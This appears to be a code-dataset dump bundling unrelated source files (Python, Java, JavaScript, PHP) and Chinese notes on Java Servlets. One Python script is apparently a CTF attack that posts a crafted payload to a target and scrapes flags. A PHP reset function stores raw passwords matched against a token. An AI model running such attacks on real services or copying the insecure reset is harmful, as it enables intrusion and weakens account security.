language
stringclasses 15
values | src_encoding
stringclasses 34
values | length_bytes
int64 6
7.85M
| score
float64 1.5
5.69
| int_score
int64 2
5
| detected_licenses
listlengths 0
160
| license_type
stringclasses 2
values | text
stringlengths 9
7.85M
|
---|---|---|---|---|---|---|---|
Python
|
UTF-8
| 208 | 3.0625 | 3 |
[] |
no_license
|
#AAAABBBBCCDDD->A4B4C2D3
line='ABBCDDD'
list1=[]
for i in line:
x=line.count(i)
if i not in list1:
list1.append(i)
list1.append(x)
x=''
for i in list1:
x+=str(i)
print(x)
|
Java
|
UTF-8
| 370 | 2.859375 | 3 |
[] |
no_license
|
class Solution {
public int countPrimes(int n) {
if (n <= 1) {
return 0;
}
int count = 0;
for(int i = 2; i < n; i++) {
boolean flag = true;
for(int j = 2; j < i; j++) {
if(i % j == 0) {
flag = false;
break;
}
}
if (flag == true) {
count++;
}
}
return count;
}
}
|
Python
|
UTF-8
| 964 | 2.71875 | 3 |
[] |
no_license
|
#!/usr/bin/python2.7
#coding:utf-8
from sys import *
import requests
import re,string,random
# import hackhttp
host = argv[1]
port = int(argv[2])
timeout = 30
target = "http://%s:%s"%(host,port)
def randomString(stringLength=10):
"""Generate a random string of fixed length """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def gen_str_atk(i):
text = randomString(i)
v = sum(map(ord, text))
while v!=1024:
text = randomString(i)
v = sum(map(ord, text))
return text, (v%2 == 0)
def exp():
try:
t= requests.post(target+'/post',data={'title':'a','author':'b','content':gen_str_atk(9)},timeout=timeout,headers={'User-Agent':'checker'}).text
# print(t)
rr = re.findall(r'flag{.*?}',t)
print(rr)
return rr
except Exception as e:
print('fail')
exit(0)
if __name__ == '__main__':
print(exp())
|
Java
|
UTF-8
| 2,359 | 2.5 | 2 |
[] |
no_license
|
package com.okry.amt.ui.animhoriscroll;
import android.content.Context;
import android.view.View;
import java.util.List;
/**
* Created by marui on 13-11-26.
*/
public abstract class BaseHoriScrollItemAdapter<T> {
protected List<T> mList;
private HoriDataSetObserver mDataSetObserver;
public abstract View initView(LinearHoriScrollView parent, Context context, int position);
public int getCount() {
return mList==null ? 0:mList.size();
}
public T getItem(int position) {
if(mList != null && position >= 0 && position <= mList.size() - 1){
return mList.get(position);
}else{
return null;
}
}
public void setData(List<T> list){
mList = list;
}
public void remove(int position){
if(mList != null){
mList.remove(position);
if(mDataSetObserver != null){
mDataSetObserver.onRemove(position);
}
}
}
public void remove(T item) {
if (mList != null) {
int index = indexOf(item);
mList.remove(index);
if (mDataSetObserver != null) {
mDataSetObserver.onRemove(index);
}
}
}
private int indexOf(T item) {
for (int i = 0; i < mList.size(); i++) {
if (item.equals(mList.get(i))) return i;
}
return -1;
}
/**
* Register an observer that is called when changes happen to the data used by this adapter.
*
* @param observer the object that gets notified when the data set changes.
*/
public void registerDataSetObserver(HoriDataSetObserver observer){
mDataSetObserver = observer;
}
/**
* Unregister an observer that has previously been registered with this
* adapter via {@link #registerDataSetObserver}.
*
* @param observer the object to unregister.
*/
public void unregisterDataSetObserver(HoriDataSetObserver observer){
mDataSetObserver = null;
}
public void notifyDataSetChange() {
if (mDataSetObserver != null) {
mDataSetObserver.onInvalidated();
}
}
public interface HoriDataSetObserver {
public void onAdd(int position);
public void onRemove(int position);
public void onInvalidated();
}
}
|
JavaScript
|
UTF-8
| 3,313 | 2.546875 | 3 |
[] |
no_license
|
/**
* @fileOverview Authentication (Signin and signup) action file
*
* @author Paradise Kelechi
*
* @requires NPM:axios
* @requires NPM:querystring
* @requires NPM:react-router
* @requires ../helpers/Constants
* @requires ../../tools/Routes
* @requires ../helpers/Alert
* @requires ../helpers/Authentication'
*
*/
import axios from 'axios';
import querystring from 'querystring';
import {
browserHistory
} from 'react-router';
import {
SIGNIN_USER,
GOOGLE_SIGNIN_USER,
SIGNUP_USER,
LOGOUT_USER,
} from '../helpers/Constants';
import routes from '../../tools/Routes';
import {
authenticatePersist,
authenticateClear
} from '../helpers/Authentication';
import Alert from '../helpers/Alert';
export const signinUserAsync = data => ({
type: SIGNIN_USER,
payload: data
});
/**
*
* Signin user action
*
* @export signinUser
*
* @param {Object} user
*
* @returns {void}
*/
export const signinUser = (user) => {
const formdata = querystring.stringify({
username: user.username,
password: user.password
});
return (dispatch) => {
return axios.post(`${routes.signin}`, formdata)
.then((response) => {
const responseData = response.data;
authenticatePersist(responseData.token);
dispatch(signinUserAsync(responseData));
browserHistory.push('/books');
}).catch((error) => {
Alert('error', error.response.data.message, null);
});
};
};
export const signupUserAsync = user => ({
type: SIGNUP_USER,
payload: user
});
/**
* Signup user action
*
* @export signupUser
* @param {object} user
* @returns {void}
*/
export const signupUser = (user) => {
const formdata = querystring.stringify({
username: user.username,
password: user.password,
email: user.email
});
return (dispatch) => {
const request = axios
.post(`${routes.signup}`, formdata);
return request
.then((response) => {
authenticatePersist(response.data.token);
dispatch(signupUserAsync(response.data));
browserHistory.push('/books');
}).catch((error) => {
Alert('error', error.response.data.message, null);
});
};
};
export const googleSigninUserAsync = payload => ({
type: GOOGLE_SIGNIN_USER,
payload
});
/**
* Google signin user action
*
* @export googleSigninUser
*
* @param {Object} user
*
* @returns {void}
*/
export const googleSigninUser = (user) => {
const formdata = querystring.stringify({
username: user.username,
password: user.password,
email: user.email
});
return (dispatch) => {
const request = axios
.post(`${routes.googleSignin}`, formdata);
return request
.then((response) => {
authenticatePersist(response.data.token);
dispatch(googleSigninUserAsync(response.data));
browserHistory.push('/books');
}).catch((error) => {
Alert('error', error.response.data.message, null);
});
};
};
export const logoutUserAsync = user => ({
type: LOGOUT_USER,
user
});
/**
* Logout user action
*
* @export logoutUser
*
* @param {Object} user
*
* @returns {Object} logout dispatch
*/
export const logoutUser = (user) => {
return (dispatch) => {
authenticateClear();
dispatch(logoutUserAsync(user));
browserHistory.push('/signin');
};
};
|
Java
|
UTF-8
| 1,224 | 2.0625 | 2 |
[] |
no_license
|
package com.junyou.bus.xingkongbaozang.configure.export;
import java.util.Map;
import com.junyou.configure.vo.GoodsConfigureVo;
/**
*
* @description 七日开服活动配置表 (全民修仙)
*
* @author ZHONGDIAN
* @date 2013-12-12 11:43:48
*/
public class XkbzConfig {
private Integer id;
private Integer jifen;//消费类型具体值
//奖励物品-服务自己用的(通用奖励和职业奖励已合并)
private Map<String,GoodsConfigureVo> itemMap;
//奖励物品-给客户端用的(通用奖励和职业奖励已合并)
private String jianLiClient;
public Integer getId() {
return id;
}
public void setId(Integer id) {
this.id = id;
}
public Integer getJifen() {
return jifen;
}
public void setJifen(Integer jifen) {
this.jifen = jifen;
}
public Map<String, GoodsConfigureVo> getItemMap() {
return itemMap;
}
public void setItemMap(Map<String, GoodsConfigureVo> itemMap) {
this.itemMap = itemMap;
}
public String getJianLiClient() {
return jianLiClient;
}
public void setJianLiClient(String jianLiClient) {
this.jianLiClient = jianLiClient;
}
public Object[] getVo(){
return new Object[]{
getId(),
getJifen(),
getJianLiClient()
};
}
}
|
JavaScript
|
UTF-8
| 18,732 | 3.453125 | 3 |
[
"MIT"
] |
permissive
|
(function() {
function Vector(x, y, z) {
this.x = x || 0;
this.y = y || 0;
this.z = z || 0;
}
Vector.prototype = {
negative: function() {
return new Vector(-this.x, -this.y, -this.z);
},
add: function(v) {
if (v instanceof Vector) return new Vector(this.x + v.x, this.y + v.y, this.z + v.z);
else return new Vector(this.x + v, this.y + v, this.z + v);
},
subtract: function(v) {
if (v instanceof Vector) return new Vector(this.x - v.x, this.y - v.y, this.z - v.z);
else return new Vector(this.x - v, this.y - v, this.z - v);
},
multiply: function(v) {
if (v instanceof Vector) return new Vector(this.x * v.x, this.y * v.y, this.z * v.z);
else return new Vector(this.x * v, this.y * v, this.z * v);
},
divide: function(v) {
if (v instanceof Vector) return new Vector(this.x / v.x, this.y / v.y, this.z / v.z);
else return new Vector(this.x / v, this.y / v, this.z / v);
},
equals: function(v) {
return this.x == v.x && this.y == v.y && this.z == v.z;
},
dot: function(v) {
return this.x * v.x + this.y * v.y + this.z * v.z;
},
cross: function(v) {
return new Vector(
this.y * v.z - this.z * v.y,
this.z * v.x - this.x * v.z,
this.x * v.y - this.y * v.x
);
},
length: function() {
return Math.sqrt(this.dot(this));
},
unit: function() {
return this.divide(this.length());
},
min: function() {
return Math.min(Math.min(this.x, this.y), this.z);
},
max: function() {
return Math.max(Math.max(this.x, this.y), this.z);
},
toAngles: function() {
return {
theta: Math.atan2(this.z, this.x),
phi: Math.asin(this.y / this.length())
};
},
angleTo: function(a) {
return Math.acos(this.dot(a) / (this.length() * a.length()));
},
toArray: function(n) {
return [this.x, this.y, this.z].slice(0, n || 3);
},
clone: function() {
return new Vector(this.x, this.y, this.z);
},
init: function(x, y, z) {
this.x = x; this.y = y; this.z = z;
return this;
},
noZ: function() {
this.z = 0;
return this;
}
};
Vector.negative = function(a, b) {
b.x = -a.x; b.y = -a.y; b.z = -a.z;
return b;
};
Vector.add = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x + b.x; c.y = a.y + b.y; c.z = a.z + b.z; }
else { c.x = a.x + b; c.y = a.y + b; c.z = a.z + b; }
return c;
};
Vector.subtract = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x - b.x; c.y = a.y - b.y; c.z = a.z - b.z; }
else { c.x = a.x - b; c.y = a.y - b; c.z = a.z - b; }
return c;
};
Vector.multiply = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x * b.x; c.y = a.y * b.y; c.z = a.z * b.z; }
else { c.x = a.x * b; c.y = a.y * b; c.z = a.z * b; }
return c;
};
Vector.divide = function(a, b, c) {
if (b instanceof Vector) { c.x = a.x / b.x; c.y = a.y / b.y; c.z = a.z / b.z; }
else { c.x = a.x / b; c.y = a.y / b; c.z = a.z / b; }
return c;
};
Vector.cross = function(a, b, c) {
c.x = a.y * b.z - a.z * b.y;
c.y = a.z * b.x - a.x * b.z;
c.z = a.x * b.y - a.y * b.x;
return c;
};
Vector.unit = function(a, b) {
var length = a.length();
b.x = a.x / length;
b.y = a.y / length;
b.z = a.z / length;
return b;
};
Vector.fromAngles = function(theta, phi) {
return new Vector(Math.cos(theta) * Math.cos(phi), Math.sin(phi), Math.sin(theta) * Math.cos(phi));
};
Vector.randomDirection = function() {
return Vector.fromAngles(Math.random() * Math.PI * 2, Math.asin(Math.random() * 2 - 1));
};
Vector.min = function(a, b) {
return new Vector(Math.min(a.x, b.x), Math.min(a.y, b.y), Math.min(a.z, b.z));
};
Vector.max = function(a, b) {
return new Vector(Math.max(a.x, b.x), Math.max(a.y, b.y), Math.max(a.z, b.z));
};
Vector.lerp = function(a, b, fraction) {
return b.subtract(a).multiply(fraction).add(a);
};
Vector.fromArray = function(a) {
return new Vector(a[0], a[1], a[2]);
};
Vector.angleBetween = function(a, b) {
return a.angleTo(b);
};
window.Vector = Vector;
})();
(function(){
'use strict';
// Configuration options
var opts = {
background: 'black',
numberOrbs: 150, // increase with screen size. 50 to 100 for my 2560 x 1400 monitor
maxVelocity: 2.5, // increase with screen size--dramatically affects line density. 2-3 for me
orbRadius: 1, // keep small unless you really want to see the dots bouncing. I like <= 1.
minProximity: 100, // controls how close dots have to come to each other before lines are traced
initialColorAngle: 7, // initialize the color angle, default = 7
colorFrequency: 0.3, // 0.3 default
colorAngleIncrement: 0.009, // 0.009 is slow and even
globalAlpha: 0.010, //controls alpha for lines, but not dots (despite the name)
manualWidth: false, // Default: false, change to your own custom width to override width = window.innerWidth. Yes i know I'm mixing types here, sue me.
manualHeight: false// Default: false, change to your own custom height to override height = window.innerHeight
};
// Canvas globals
var canvasTop, linecxt, canvasBottom, cxt, width, height, animationFrame;
// Global objects
var orbs;
// Orb object - these are the guys that bounce around the screen.
// We will draw lines between these dots, but that behavior is found
// in the Orbs container object
var Orb = (function() {
// Constructor
function Orb(radius, color) {
var posX = randBetween(0, width);
var posY = randBetween(0, height);
this.position = new Vector(posX, posY);
var velS = randBetween(0, opts.maxVelocity); // Velocity scalar
this.velocity = Vector.randomDirection().multiply(velS).noZ();
this.radius = radius;
this.color = color;
}
// Orb methods
Orb.prototype = {
update: function() {
// position = position + velocity
this.position = this.position.add(this.velocity);
// bounce if the dot reaches the edge of the container.
// this can be EXTREMELY buggy with large dot radiuses, but it works for this
// drawing.
if (this.position.x + this.radius >= width || this.position.x - this.radius <= 0) {
this.velocity.x = this.velocity.x * -1;
}
if (this.position.y + this.radius >= height || this.position.y - this.radius <= 0) {
this.velocity.y = this.velocity.y * -1;
}
},
display: function() {
cxt.beginPath();
cxt.fillStyle = this.color;
cxt.ellipse(this.position.x, this.position.y, this.radius, this.radius, 0, 0, 2*Math.PI, false);
cxt.fill();
cxt.closePath();
},
run: function() {
this.update();
this.display();
}
};
return Orb;
})();
// Orbs object - this is a container that manages all of the individual Orb objects.
// In addition, this object holds the color phasing and line-drawing functionality,
// since it already iterates over all the orbs once per frame anyway.
var Orbs = (function() {
// Constructor
function Orbs(numberOrbs, radius, initialColorAngle, globalAlpha, colorAngleIncrement, colorFrequency) {
this.orbs = [];
this.colorAngle = initialColorAngle;
this.colorAngleIncrement = colorAngleIncrement;
this.globalAlpha = globalAlpha;
this.colorFrequency = colorFrequency;
this.color = null;
for (var i = 0; i < numberOrbs; i++) {
this.orbs.push(new Orb(radius, this.color));
}
}
Orbs.prototype = {
run: function() {
this.phaseColor();
for (var i = 0; i < this.orbs.length; i++) {
for (var j = i + 1; j < this.orbs.length; j++) {
// we only want to compare this orb to orbs which are further along in the array,
// since any that came before will have already been compared to this orb.
this.compare(this.orbs[i], this.orbs[j]);
}
this.orbs[i].color = this.color;
this.orbs[i].run();
}
},
compare: function(orbA, orbB) {
// Get the distance between the two orbs.
var distance = Math.abs(orbA.position.subtract(orbB.position).length());
if (distance <= opts.minProximity) {
// the important thing to note here is that we're drawing this onto '#canvas-top'
// since we want to preserve everything drawn to that layer.
linecxt.beginPath();
linecxt.strokeStyle = this.color;
linecxt.globalAlpha = this.globalAlpha;
linecxt.moveTo(orbA.position.x, orbA.position.y);
linecxt.lineTo(orbB.position.x, orbB.position.y);
linecxt.stroke();
linecxt.closePath();
}
},
phaseColor: function() {
// color component = sin(freq * angle + phaseOffset) => (between -1 and 1) * 127 + 128
var r = Math.floor(Math.sin(this.colorFrequency*this.colorAngle + Math.PI*0/3) * 127 + 128);
var g = Math.floor(Math.sin(this.colorFrequency*this.colorAngle + Math.PI*2/3) * 127 + 128);
var b = Math.floor(Math.sin(this.colorFrequency*this.colorAngle + Math.PI*4/3) * 127 + 128);
this.color = 'rgba(' + r + ', ' + g + ', ' + b + ', 1)';
this.colorAngle += this.colorAngleIncrement;
}
};
return Orbs;
})();
// This function is called once and only once to kick off the code.
// It links DOM objects like the canvas to the respective global variable.
function initialize() {
canvasTop = document.querySelector('#canvas-top'); // this canvas is for the lines between dots
canvasBottom = document.querySelector('#canvas-bottom'); // this canvas is for the dots that bounce around
linecxt = canvasTop.getContext('2d');
cxt = canvasBottom.getContext('2d');
window.addEventListener('resize', resize, false);
resize();
}
// This function is called after initialization and window resize.
function resize() {
width = opts.manualWidth ? opts.manualWidth : window.innerWidth;
height = opts.manualHeight ? opts.manualHeight : window.innerHeight;
setup();
}
// after window resize we need to
function setup() {
canvasTop.width = width;
canvasTop.height = height;
canvasBottom.width = width;
canvasBottom.height = height;
//fillBackground(linecxt); // Enable this line if you want to save an image of the drawing.
fillBackground(cxt);
orbs = new Orbs(opts.numberOrbs, opts.orbRadius, opts.initialColorAngle, opts.globalAlpha, opts.colorAngleIncrement, opts.colorFrequency);
// If we hit this line, it was either via initialization procedures (which means animationFrame is undefined)
// or through window resize, in which case we need to cancel the old draw loop and make a new one.
if (animationFrame !== undefined) { cancelAnimationFrame(animationFrame); }
draw();
}
// Notice that we only fillBackground on one of the two canvases. This is because we want to animate
// the dot layer (we don't want to leave trails left by the dots), but preserve the line layer.
function draw() {
fillBackground(cxt);
orbs.run();
// Update the global animationFrame variable -- this enables to cancel the redraw loop on resize
animationFrame = requestAnimationFrame(draw);
}
// generic background fill function
function fillBackground(context) {
context.fillStyle = opts.background;
context.fillRect(0, 0, width, height);
}
// get random float between two numbers, inclusive
function randBetween(low, high) {
return Math.random() * (high - low) + low;
}
// get random INT between two numbers, inclusive
function randIntBetween(low, high) {
return Math.floor(Math.random() * (high - low + 1) + low);
}
// Start the code already, dammit!
initialize();
})();
var container = $(".nav-container"),
target = $(".hero-banner").outerHeight() - 60;
$(window).scroll(function() {
if ($(window).scrollTop() >= target) {
container.addClass("scroll-nav");
} else {
container.removeClass("scroll-nav");
}
}); // End scroll
// Typing Stuff
//set animation timing
var animationDelay = 2500,
//loading bar effect
barAnimationDelay = 3800,
barWaiting = barAnimationDelay - 3000, //3000 is the duration of the transition on the loading bar - set in the scss/css file
//letters effect
lettersDelay = 50,
//type effect
typeLettersDelay = 150,
selectionDuration = 500,
typeAnimationDelay = selectionDuration + 800,
//clip effect
revealDuration = 600,
revealAnimationDelay = 1500;
initHeadline();
function initHeadline() {
//insert <i> element for each letter of a changing word
singleLetters($('.cd-headline.letters').find('b'));
//initialise headline animation
animateHeadline($('.cd-headline'));
}
function singleLetters(words) {
words.each(function() {
var word = $(this),
letters = word.text().split(''),
selected = word.hasClass('is-visible');
for (i in letters) {
if (word.parents('.rotate-2').length > 0) letters[i] = '<em>' + letters[i] + '</em>';
letters[i] = (selected) ? '<i class="in">' + letters[i] + '</i>' : '<i>' + letters[i] + '</i>';
}
var newLetters = letters.join('');
word.html(newLetters).css('opacity', 1);
});
}
function animateHeadline($headlines) {
var duration = animationDelay;
$headlines.each(function() {
var headline = $(this);
if (headline.hasClass('loading-bar')) {
duration = barAnimationDelay;
setTimeout(function() {
headline.find('.cd-words-wrapper').addClass('is-loading')
}, barWaiting);
} else if (headline.hasClass('clip')) {
var spanWrapper = headline.find('.cd-words-wrapper'),
newWidth = spanWrapper.width() + 10
spanWrapper.css('width', newWidth);
} else if (!headline.hasClass('type')) {
//assign to .cd-words-wrapper the width of its longest word
var words = headline.find('.cd-words-wrapper b'),
width = 0;
words.each(function() {
var wordWidth = $(this).width();
if (wordWidth > width) width = wordWidth;
});
headline.find('.cd-words-wrapper').css('width', width);
};
//trigger animation
setTimeout(function() {
hideWord(headline.find('.is-visible').eq(0))
}, duration);
});
}
function hideWord(word) {
var nextWord = takeNext(word);
if (word.parents('.cd-headline').hasClass('type')) {
var parentSpan = word.parent('.cd-words-wrapper');
parentSpan.addClass('selected').removeClass('waiting');
setTimeout(function() {
parentSpan.removeClass('selected');
word.removeClass('is-visible').addClass('is-hidden').children('i').removeClass('in').addClass('out');
}, selectionDuration);
setTimeout(function() {
showWord(nextWord, typeLettersDelay)
}, typeAnimationDelay);
} else if (word.parents('.cd-headline').hasClass('letters')) {
var bool = (word.children('i').length >= nextWord.children('i').length) ? true : false;
hideLetter(word.find('i').eq(0), word, bool, lettersDelay);
showLetter(nextWord.find('i').eq(0), nextWord, bool, lettersDelay);
} else if (word.parents('.cd-headline').hasClass('clip')) {
word.parents('.cd-words-wrapper').animate({
width: '2px'
}, revealDuration, function() {
switchWord(word, nextWord);
showWord(nextWord);
});
} else if (word.parents('.cd-headline').hasClass('loading-bar')) {
word.parents('.cd-words-wrapper').removeClass('is-loading');
switchWord(word, nextWord);
setTimeout(function() {
hideWord(nextWord)
}, barAnimationDelay);
setTimeout(function() {
word.parents('.cd-words-wrapper').addClass('is-loading')
}, barWaiting);
} else {
switchWord(word, nextWord);
setTimeout(function() {
hideWord(nextWord)
}, animationDelay);
}
}
function showWord(word, $duration) {
if (word.parents('.cd-headline').hasClass('type')) {
showLetter(word.find('i').eq(0), word, false, $duration);
word.addClass('is-visible').removeClass('is-hidden');
} else if (word.parents('.cd-headline').hasClass('clip')) {
word.parents('.cd-words-wrapper').animate({
'width': word.width() + 10
}, revealDuration, function() {
setTimeout(function() {
hideWord(word)
}, revealAnimationDelay);
});
}
}
function hideLetter($letter, word, $bool, $duration) {
$letter.removeClass('in').addClass('out');
if (!$letter.is(':last-child')) {
setTimeout(function() {
hideLetter($letter.next(), word, $bool, $duration);
}, $duration);
} else if ($bool) {
setTimeout(function() {
hideWord(takeNext(word))
}, animationDelay);
}
if ($letter.is(':last-child') && $('html').hasClass('no-csstransitions')) {
var nextWord = takeNext(word);
switchWord(word, nextWord);
}
}
function showLetter($letter, word, $bool, $duration) {
$letter.addClass('in').removeClass('out');
if (!$letter.is(':last-child')) {
setTimeout(function() {
showLetter($letter.next(), word, $bool, $duration);
}, $duration);
} else {
if (word.parents('.cd-headline').hasClass('type')) {
setTimeout(function() {
word.parents('.cd-words-wrapper').addClass('waiting');
}, 200);
}
if (!$bool) {
setTimeout(function() {
hideWord(word)
}, animationDelay)
}
}
}
function takeNext(word) {
return (!word.is(':last-child')) ? word.next() : word.parent().children().eq(0);
}
function takePrev(word) {
return (!word.is(':first-child')) ? word.prev() : word.parent().children().last();
}
function switchWord($oldWord, $newWord) {
$oldWord.removeClass('is-visible').addClass('is-hidden');
$newWord.removeClass('is-hidden').addClass('is-visible');
}
$(document).on("click", ".call-button", function(e) {
e.preventDefault();
// Make something fancy happen
$('.call-form').toggle();
});
// End ready
var main = document.getElementById('main');
function checkNav() {
if (main.classList.contains('active')) {
closeNav();
}
else {
openNav();
}
}
function openNav() {
main.classList.add('active');
}
function closeNav() {
main.classList.remove('active');
}
window.onload = function(){
$(".containerquay").fadeOut('fast').delay(2000).queue(function() {$(this).remove();});
};
|
PHP
|
UTF-8
| 2,520 | 3.078125 | 3 |
[
"MIT"
] |
permissive
|
<?php
namespace AsyncAws\CloudWatch\ValueObject;
use AsyncAws\Core\Exception\InvalidArgument;
/**
* Represents a set of statistics that describes a specific metric.
*/
final class StatisticSet
{
/**
* The number of samples used for the statistic set.
*
* @var float
*/
private $sampleCount;
/**
* The sum of values for the sample set.
*
* @var float
*/
private $sum;
/**
* The minimum value of the sample set.
*
* @var float
*/
private $minimum;
/**
* The maximum value of the sample set.
*
* @var float
*/
private $maximum;
/**
* @param array{
* SampleCount: float,
* Sum: float,
* Minimum: float,
* Maximum: float,
* } $input
*/
public function __construct(array $input)
{
$this->sampleCount = $input['SampleCount'] ?? $this->throwException(new InvalidArgument('Missing required field "SampleCount".'));
$this->sum = $input['Sum'] ?? $this->throwException(new InvalidArgument('Missing required field "Sum".'));
$this->minimum = $input['Minimum'] ?? $this->throwException(new InvalidArgument('Missing required field "Minimum".'));
$this->maximum = $input['Maximum'] ?? $this->throwException(new InvalidArgument('Missing required field "Maximum".'));
}
/**
* @param array{
* SampleCount: float,
* Sum: float,
* Minimum: float,
* Maximum: float,
* }|StatisticSet $input
*/
public static function create($input): self
{
return $input instanceof self ? $input : new self($input);
}
public function getMaximum(): float
{
return $this->maximum;
}
public function getMinimum(): float
{
return $this->minimum;
}
public function getSampleCount(): float
{
return $this->sampleCount;
}
public function getSum(): float
{
return $this->sum;
}
/**
* @internal
*/
public function requestBody(): array
{
$payload = [];
$v = $this->sampleCount;
$payload['SampleCount'] = $v;
$v = $this->sum;
$payload['Sum'] = $v;
$v = $this->minimum;
$payload['Minimum'] = $v;
$v = $this->maximum;
$payload['Maximum'] = $v;
return $payload;
}
/**
* @return never
*/
private function throwException(\Throwable $exception)
{
throw $exception;
}
}
|
PHP
|
UTF-8
| 510 | 2.65625 | 3 |
[] |
no_license
|
<?php
function update_new_password($token, $password){
try{
global $bdd;
$query = $bdd->prepare("UPDATE ifup_user SET ifup_user_password=:ifup_user_password WHERE ifup_user_password=:token");
$query->bindParam(':ifup_user_password',$password, PDO::PARAM_STR);
$query->bindParam(':token',$token, PDO::PARAM_STR);
$query->execute();
return $query;
}
catch(Exception $e){
return false;
}
}
|
Markdown
|
UTF-8
| 8,821 | 2.578125 | 3 |
[] |
no_license
|
[toc]
## **Servlet 是什么?**
Java Servlet 是运行在 Web 服务器或应用服务器上的程序,它是作为来自 Web 浏览器或其他 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层。
==Servlet是一个Java编写的程序,此程序是基于Http协议的,在服务器端运行的(如tomcat),是按照Servlet规范编写的一个Java类。Servlet可以支持客户端和服务器之间的请求影响==
使用 Servlet,您可以收集来自网页表单的用户输入,呈现来自数据库或者其他源的记录,还可以动态创建网页。
Java Servlet 通常情况下与使用 CGI(Common Gateway Interface,公共网关接口)实现的程序可以达到异曲同工的效果。但是相比于 CGI,Servlet 有以下几点优势:
- 性能明显更好。
- Servlet 在 Web 服务器的地址空间内执行。这样它就没有必要再创建一个单独的进程来处理每个客户端请求。
- Servlet 是独立于平台的,因为它们是用 Java 编写的。
- 服务器上的 Java 安全管理器执行了一系列限制,以保护服务器计算机上的资源。因此,Servlet 是可信的。
- Java 类库的全部功能对 Servlet 来说都是可用的。它可以通过 sockets 和 RMI 机制与 applets、数据库或其他软件进行交互。
## Servlet处理流程

- 服务器创建对象,并且执行init方法,并且调用service方法
- 容器创建两个对象,httpservletresponse和httpservletrequest
- http请求为get那么doget,post那么dopost
- Servlet处理请求的方式是以线程的方式
>流程
1. 浏览器向服务器发出GET请求(请求服务器ServletA)
2. 服务器上的容器逻辑接收到该url,根据该url判断为Servlet请求,此时容器逻辑将产生两个对象:请求对象(HttpServletRequest)和响应对象(HttpServletResponce)
3. 容器逻辑根据url找到目标Servlet(本示例目标Servlet为ServletA),且创建一个线程A
4. 容器逻辑将刚才创建的请求对象和响应对象传递给线程A
5. 容器逻辑调用Servlet的service()方法
6. service()方法根据请求类型(本示例为GET请求)调用doGet()(本示例调用doGet())或doPost()方法
7. doGet()执行完后,将结果返回给容器逻辑
8. 线程A被销毁或被放在线程池中
## forward和redirect区别
- 服务器重定向,直接访问URL,服务器直接访问,客户端不知道,浏览器上没有重新跳转,定向过程中有一个request。
- redirect服务器重定向,完全跳转,浏览器会跳转到其他网址,(baidu.com变成www.baidu.com)。多用一次网络请求,
## **javax.servlet 包中包含了 7 个接口 ,3 个类和 2 个异常类**
接口 :
```
RequestDispatcher,
Servlet,ServletConfig,
ServletContext, ServletRequest,
ServletResponse
SingleThreadModel
```
类 :
```
GenericServlet,
ServletInputStream,
ServletOutputStream
```
异常类 :
```
ServletException
UnavailableException
```
### **一、UML**
下图为Servlet UML关系图。

从图中,可以看出:
```
getParameter()是获取POST/GET传递的参数值;
getInitParameter()获取Tomcat的server.xml中设置Context的初始化参数
getAttribute()是获取对象容器中的数据值; getRequestDispatcher()是请求转发。
```
1. 抽象类HttpServlet继承抽象类GenericServlet,其有两个比较关键的方法,doGet()和doPost()
2. GenericServlet实现接口Servlet,ServletConfig,Serializable
3. MyServlet(用户自定义Servlet类)继承HttpServlet,重写抽象类HttpServlet的doGet()和doPost()方法
注:任何一个用户自定义Servlet,只需重写抽象类HttpServlet的doPost()和doGet()即可,如上图的MyServlet
### **二、Servlet在容器中的执行过程**
Servlet只有放在容器中,方可执行,且Servlet容器种类较多,如Tomcat,WebLogic等。
分析:
1. 浏览器向服务器发出GET请求(请求服务器ServletA)
2. 服务器上的容器逻辑接收到该url,根据该url判断为Servlet请求,此时容器逻辑将产生两个对象:请求对象(HttpServletRequest)和响应对象(HttpServletResponce)
3. 容器逻辑根据url找到目标Servlet(本示例目标Servlet为ServletA),且创建一个线程A
4. 容器逻辑将刚才创建的请求对象和响应对象传递给线程A
5. 容器逻辑调用Servlet的service()方法
6. service()方法根据请求类型(本示例为GET请求)调用doGet()(本示例调用doGet())或doPost()方法
7. doGet()执行完后,将结果返回给容器逻辑
8. 线程A被销毁或被放在线程池中
注意:
1. 在容器中的每个Servlet原则上只有一个实例
2. 每个请求对应一个线程
3. 多个线程可作用于同一个Servlet(这是造成Servlet线程不安全的根本原因)
4. 每个线程一旦执行完任务,就被销毁或放在线程池中等待回收
### **三、Servlet在JavaWeb中扮演的角色**
**下面的方法可用在 Servlet 程序中读取 HTTP 头**
这些方法通过 *HttpServletRequest* 对象可用:
```
**1)Cookie[] getCookies()**
//返回一个数组,包含客户端发送该请求的所有的 Cookie 对象。
**2)Object getAttribute(String name)**
//以对象形式返回已命名属性的值,如果没有给定名称的属性存在,则返回 null。
**3)String getHeader(String name)**
//以字符串形式返回指定的请求头的值。Cookie也是头的一种;
**4)String getParameter(String name)**
//以字符串形式返回请求参数的值,或者如果参数不存在则返回 null。
```
除此之外:Servlet在JavaWeb中,扮演两个角色**:页面角色和控制器角色**。
有了jsp等动态页面技术后,Servlet更侧重于控制器角色,jsp+servlert+model 形成基本的三层架构
- (一)页面Page角色
```
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
request.setCharacterEncoding("UTF-8");
response.setContentType("text/html;charset=utf-8");
PrintWriter out=response.getWriter();
out.println("Hello!Servlet.");
}
```
- (二)控制器角色
jsp充当页面角色,Servlet扮演控制器角色,两者组合构建基本的MVC三层架构模式
### **四、Servlet在容器中的生命周期**
servlet 的生命周期
servlet的生命周期是由servlet的容器来控制的,主要分为初始化、运行、销毁3个阶段,Servlet容器加载servlet,实例化后调用init()方法进行初始化,当请求到达时运行service()方法,根据对应请求调用doget或dopost方法,当服务器决定将实例销毁时调用destroy()方法(释放servlet占用的资源:关闭数据库连接、关闭文件输入输出流),在整个生命周期中,servlet的初始化和销毁只会发生一次,而service方法执行的次数则取决于servlet被客户端访问的次数。
下图为Servlet生命周期简要概图

分析:
- 第一步:容器先==加载==Servlet类
- 第二步:容器==创建==实例化Servlet(Servlet无参构造函数执行)
- 第三步:执行==init()方法==(在Servlet生命周期中,只执行一次,且在service()方法执行前执行) 负责在装载Servlet时初始化Servlet对象
- 第四步:==执行service()方法,处理客户请求核心方法==,一般HttpServlet中会有get,post两种处理方式。在调用doGet和doPost方法时会构造servletRequest和servletResponse请求和响应对象作为参数。
